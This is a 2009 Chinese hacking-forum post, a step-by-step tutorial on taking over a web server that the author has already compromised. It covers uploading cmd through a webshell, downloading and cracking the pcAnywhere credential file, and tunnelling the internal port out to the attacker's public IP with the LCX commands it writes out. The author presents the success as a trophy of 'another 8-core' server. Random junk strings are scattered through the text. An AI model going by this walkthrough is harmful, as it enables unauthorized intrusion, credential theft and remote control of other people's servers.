|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
/ g# m. ^; X: V# t1 F" ^! p: ^ E: o8 E9 l6 @4 |2 q* i" F
提权方法:pcanywhere+LCX
2 Q: q) t; T' o4 K3 h# ]1 w [9 v" Z# [; @! _
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。9 V# X% V# d; F) Y* N) \& ]
" T. ]% _1 k- ^% c5 i
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
( S" E+ w; |3 @
7 c9 N9 G3 p. K5 f) k# G
. u9 _# j% r; b2 _+ L* v查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。& B6 ]' w; E" a n! _9 i1 k+ J
p9 d2 z2 H6 n6 O+ a
4 P8 ]) ~. u+ }呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
8 n6 k( i2 Y/ y) v! H3 i6 E
) _! K1 u+ p3 D) @4 C. W& z
: u: {& A. A7 }. f! f) F0 J) v8 l" }: L2 o# v
: Q+ M4 ?( ~' l1 ]. ?由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``( a7 l' O, l8 K* K3 V* j% b- D
9 r+ T# K" c7 d2 }' m1 K0 n3 W; ]: ^0 Z O
LCX的用法再简单说下:
2 L# r- H: n; ?! ]& {% B+ ^( Q% w: d' M0 z* _
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
1 v: W. A" h. ` k, z& d" x# |% X1 U" `& H
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
, D! h4 {6 a- T6 n# x* _- K0 Y4 X. z' n* y2 {+ j& Y/ h9 k4 P
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。9 K& x; v( s+ B1 S" D& i" p
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
: B+ `" g( ?( o5 s" S/ I9 i8 Z9 j" i6 @9 |6 ?- L0 [$ t# k
' v4 t2 M. b0 k; p' B6 b V' C2 _
7 x1 R0 I1 P: \, d% q7 Q8 D
% \) w& v* o. W; G m1 U
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。 G+ @7 T, {: }& _" k% p
3 U y8 s; R0 G
) N( U0 T) M7 s9 s
h: F: H- L! K5 l |7 J- S0 ?# M, ]8 Y/ x* f4 o9 n
我们本地连接试试,输入我们刚破解的账号密码) e, k+ l- o: d& S
. b) H2 P! o0 b. Z$ }1 M# `* ?
+ c! q0 {/ ~9 T& F7 Z
呵呵``连接成功,服务器不错,又一个8核^︵^: S( \* e! q o5 v7 D# O
0 e1 }5 A& l0 e2 q |7 O( }$ {* t2 l, o8 ~; \" H7 u$ J
9 e& M, Y% L+ k |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
